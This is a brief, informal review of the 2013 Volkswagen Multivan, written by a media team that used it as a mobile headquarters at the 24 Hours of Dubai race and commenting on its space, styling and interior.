We take the 2013 Volkswagen Multivan for a test drive. Well, more of a test park, as we use it for a base at the 24 Hours of Dubai race.

We had writers, photographers and videographers all camped out at the track. We needed a base, somewhere to act as a mobile headquarters.
With the Autodrome media centre chock full of international journalists, that was out. Our home away from home needed to have space to work, for storage and, ideally, to sleep as well. Salvation came from Volkswagen, in the form of the Multivan.
It is, in essence a bus. Well, a van in the shape of a bus. Or something.
Anyway, it has lots of space for crew and equipment, and a flexible interior. And it looks pretty funky as well. Check out the latest VW family face, a clean white paint job and some sweet alloys. This ain’t no delivery truck.
Inside, it’s very familiar to anyone that’s driven a Volkswagen car. The steering wheel and instrument panel are all of the same quality as a Golf or Scirocco. Although the seat is somewhat higher.
The main boot space isn’t enormous, but it’s certainly big enough to take the kit we needed.
